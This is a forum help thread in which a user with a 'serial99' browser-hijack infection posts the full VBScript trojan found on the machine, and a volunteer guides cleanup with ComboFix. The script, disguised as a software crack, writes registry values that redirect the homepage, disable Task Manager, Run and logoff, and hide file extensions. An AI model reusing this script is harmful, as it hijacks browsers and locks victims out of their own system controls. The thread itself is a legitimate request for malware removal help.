TechSpot

Serial99 hijack

By M1245456
Nov 19, 2007
  1. Hi, I got the www serial99.com/?a infection where it redirected me to that url each time, it also disabled Run, Task manager, recent docs, etc.

    There is this new avpm.vbs file in my C drive, I don't know if i can just delete it or have to run a fix? (I just renamed it to .txt so you can look at it and my virus scanner says it's trojan.vbs.disabler.b):


    wscript.echo "Cracking... now! Click here for crack!"
    itemtype = "REG_SZ"
    mustboot = "www serial99.com"
    jobfunc = "CRACKED!"
    t = "Successfull!"
    Mybox = MsgBox(jobfunc & disab & vbCR & mustboot, 4096, t)
    Set Kaspersky = WScript.CreateObject("WScript.Shell")
    Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "www serial99.com/?a","REG_SZ"
    Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Window Title", "Serial99.com","REG_SZ"
    Kaspersky.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\www","www serial99.com/?","REG_SZ"
    Kaspersky.RegWrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
    Kaspersky.RegWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
    Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "www serial99.com/?a","REG_SZ"
    Kaspersky.RegWrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "www serial99.com/?a","REG_SZ"
    Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\\DisableTaskMgr", "1","REG_SZ"
    Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoRun", "1","REG_SZ"
    Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoLogOff", "1","REG_SZ"
    Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoFind", "1","REG_SZ"
    Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoRecentDocsMenu", "1","REG_SZ"
    Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoClose", "1","REG_SZ"
    Kaspersky.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\HideFileExt","00000001","REG_DWORD"



    -----------

    Rootkit scan didn't find anything
    I'm guessing to fix my the recent docs etc. i just have to change these? :


    [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\system]
    "DisableRegistryTools"=0 (0x0)
    "DisableTaskMgr"=0 (0x0)

    [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer]
    "NoViewOnDrive"=0 (0x0)
    "NoLogoff"=1
    "NoRun"=1
    "NoFind"=1
    "NoRecentDocsMenu"=1
    "NoClose"=1


    ----------

    Also when i ran the AVG anti-spyware my kaspersky picked up Backdoor.win32.sdbot.cic and deleted it.

    By the way before i came to this site I ran DSS (Deckard's System Scanner)
    which I think is based on combo fix so I'm including the log as it shows the hijackthis stuff that was removed, and the stuff combo fix would have done. (sry about this i know u don't want extra logs)
     

    Attached Files:

  2. M1245456

    M1245456 TS Rookie Topic Starter

    hey, any help? :)
     
  3. howard_hopkinso

    howard_hopkinso TS Rookie Posts: 24,177   +19

    Open notepad and copy/paste the text in the code box below into it:
    NOTE* make sure to only highlight and copy what is inside the quote box nothing out side of it.
    Also ..

    Pay particular attention to this :-

    Make sure the word File:: is on the first line of the text file you save (no blank line above it, & no space in front of it)
    Code:



    Save this as CFScript.txt

    Then drag the CFScript.txt into ComboFix.exe as you see in the screenshot below.

    [​IMG]

    This will start ComboFix again. After reboot, (in case it asks to reboot), post the contents of Combofix.txt in your next reply together with a fresh HJT log.

    Regards Howard :)

    This thread is for the use of M1245456 only. Please don`t post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
     
  4. M1245456

    M1245456 TS Rookie Topic Starter

    Thx very much for help
     

    Attached Files:

  5. howard_hopkinso

    howard_hopkinso TS Rookie Posts: 24,177   +19

    No, I need you to post a fresh Combofix log as an attachment.

    Regards Howard :)

    This thread is for the use of M1245456 only. Please don`t post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
     
  6. M1245456

    M1245456 TS Rookie Topic Starter

    Here u go

    - Martin
     

    Attached Files:

  7. howard_hopkinso

    howard_hopkinso TS Rookie Posts: 24,177   +19

    That is not a full Combofix log.

    You need to run Combofix again and post the resulting log file.

    Regards Howard :)

    This thread is for the use of M1245456 only. Please don`t post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
     
  8. M1245456

    M1245456 TS Rookie Topic Starter

    Hi, combofix kept freezing on 'creating log', here's the dss scan (it doesn't seem to have created an extra.txt, just a main)
     
  9. howard_hopkinso

    howard_hopkinso TS Rookie Posts: 24,177   +19

    Your log file looks fine.

    Unless you`re still having problems, you should be good to go.

    Click start/run and type combofix /u into the run box and hit the enter key. That should delete Combofix and all it`s folders etc.

    Turn off system restore.(XP/ME only) See how HERE.

    Now, turn system restore back on. This will have deleted all your old restore points and any nasties that are in them. It will also have created a new, clean restore point.


    If you have any further virus/spyware problems, please post in this thread.

    Regards Howard :)

    This thread is for the use of M1245456 only. Please don`t post your own virus/spyware problems in this thread. Instead, open a new thread in our security and the web forum.
     
Topic Status:
Not open for further replies.

Similar Topics

Add New Comment

You need to be a member to leave a comment. Join thousands of tech enthusiasts and participate.
TechSpot Account You may also...